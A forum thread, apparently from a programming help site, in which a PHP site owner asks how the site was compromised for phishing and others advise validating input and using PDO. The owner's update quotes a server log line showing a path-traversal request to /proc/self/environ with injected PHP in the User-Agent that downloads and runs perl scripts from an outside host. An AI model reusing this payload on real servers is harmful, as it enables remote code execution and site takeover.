My website has been attacked for phishing purposes. It is a complex website however I only use post and PHP files.
How could they attack me? I only use $_POST so I believe no SQL command and parameters are visible. There is no framework just my little coding listing and accessing on the website.
Any hint/suggestion would be appreciated.
Sorry if I don't reply straight but I am dealing with my provider who blocked the whole site.
this is their answer (any comment on it will be welcomed):
Because script injection attacks the site code itself, it is able to completely avoid webserver security. Unfortunately, some content management systems (especially older versions of Joomla) are extremely susceptible to this form of attack.
A simple way to remove the ability for attackers to use this method is to add a php.ini file at the top-level of the website with the following contents - be aware though that the web-site will need testing afterwards to ensure that no legitimate web-site scripted actions have been affected by the change:
The php.ini directives are...
allow_url_include = "0"
update:
here is what I got from the webhost company:
121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http://some.thesome.com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget http://some.thesome.com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>"
POST requests can be issued manually too, using cURL for example. There is no one preventing people from just opening a telnet terminal and issuing the command manually, and sending whatever parameters to your website.
Instead, you should always protect your website, and validate the input. Whether they come from POST, GET or any place else. Also, prefer to use PDO instead of the standard mysql functions in PHP.
Could you elaborate on what kind of attack happened on your website?